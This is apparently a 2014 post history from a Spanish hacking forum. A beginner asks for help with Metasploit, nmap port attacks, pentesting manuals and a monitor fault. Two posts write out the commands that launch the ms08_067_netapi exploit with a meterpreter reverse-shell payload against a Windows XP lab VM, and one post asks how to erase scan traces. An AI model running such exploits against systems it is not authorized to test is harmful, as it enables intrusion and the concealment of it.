elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


  Mostrar Mensajes
Páginas: [1] 2
1  Seguridad Informática / Hacking / Re: ayuda! problema con exploit (ms08_067_netapi) metaesploit.. en: 23 Septiembre 2014, 04:22 am
hola; si bro el firewail esta desactivado y sigue igual tenes idea de que podra ser? si sabes me avisas?



saludos
2  Seguridad Informática / Hacking / ayuda! problema con exploit (ms08_067_netapi) metaesploit.. en: 23 Septiembre 2014, 02:34 am
hola gente, bueno eh aqui con un problema, tengo instalado en una maquina virtual windows xp SP2 tiene el puerto 445 abierto, segun la info del exploit (ms08_067_netapi) dice que es vulnerable pero no me sale la sección del meterpreter :(, bueno esto es todo lo que tipeo.
msf > use windows/smb/ms08_067_netapi

msf exploit (ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

msf exploit (ms08_067_netapi) > set lhost "mi ip"

msf exploit (ms08_067_netapi) > set rhost "ip de maquina virtual a atacar"

msf exploit (ms08_067_netapi) > exploit

bueno y aqui les dejo una imagen del problema.

3  Seguridad Informática / Bugs y Exploits / Re: ayuda, al lanzar exploit con metaesploit en: 17 Septiembre 2014, 01:48 am
hola , el windows de la maquina virtual es professional sp3 español, el exploit dice que si windows xp sp3 español es vulnerable,¿no sabes que podra ser?



saludos
4  Seguridad Informática / Bugs y Exploits / ayuda, al lanzar exploit con metaesploit en: 14 Septiembre 2014, 21:36 pm
hola gente, tengo una maquina virtual con windows xp, esta tiene el puerto 445 abierto, bueno yendo al tema, en metaesploit uso el exploit [windows/smb/ms08_067_netapi] , que es el correcto, llendo aqui hago lo siguiente

msf > use windows/smb/ms08_067_netapi

msf > set payload windows/meterpreter/reverse_tcp

msf > set lhost "mi ip"

msf > set rhost "ip a atacar"

y al miren la imagen [http://prntscr.com/4mu8qh]

se que soy muy malo explicando, espero que me hayan entendido, saludos
5  Informática / Hardware / ayuda!, mi pantalla se ve mas oscura del lado derecho en: 11 Agosto 2014, 04:11 am
hola gente , mi pantalla se ve bien del lado izquierdo y yendo para el lado derecho va oscuresiendo, creo q es el monitor :( , mas info no recibio ningun golpe, un dia andaba bien y la prendi al otro y me pasa esto :(

quien me dice que puede ser ? saludos :(
6  Seguridad Informática / Hacking / ayuda! pregunta ignorante de nmap en: 9 Agosto 2014, 06:38 am
hola gente :D , tengo una duda respecto a nmap , cuando scaneamos una ip, quedan registros en la otra pc de que hisimos el scaneeo ? , hay alguna forma de borrarlo ? perdon por la ignorancia :P



saludos
7  Seguridad Informática / Hacking / ¡ayuda! tengo una duda respecto hacia como "atacar" puertos en: 8 Agosto 2014, 01:08 am
hola gente :D , tengo duda hacia como atacar puertos, ejemplo, scaneeo una ip con nmap y me salen algunos puertos abiertos, ahi vuelvo a scanear para ver que servicios corren en el puerto y ¿ahora que?,debo usar metaesploit no?, ayuda soy un poco nuevo en esto y trato de entenderlo, si alguien pudiera aclararmelo o pasarme algun pdf respecto se los agradeceria mucho :d :D :D


saludos & disculpen la ignorancia :)
8  Seguridad Informática / Hacking / quien me pasa un manual de pentesting desde cero? en: 29 Julio 2014, 00:14 am
hola gente :D , me interesa mucho el tema pero no encuentro documentacion, quien seria tan amable de pasarme un manual de pentesting? , uso windows 7




saludos :D
9  Seguridad Informática / Hacking / Re: ¡ayuda!, problema con metaesploit en: 23 Julio 2014, 20:07 pm
graacias falc0n lo probare :D


saludos men :)
10  Seguridad Informática / Hacking / Re: ¡ayuda!, problema con metaesploit en: 22 Julio 2014, 19:17 pm
disculpa la ignorancia, pero cual dices tu? http://prntscr.com/458hm3
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines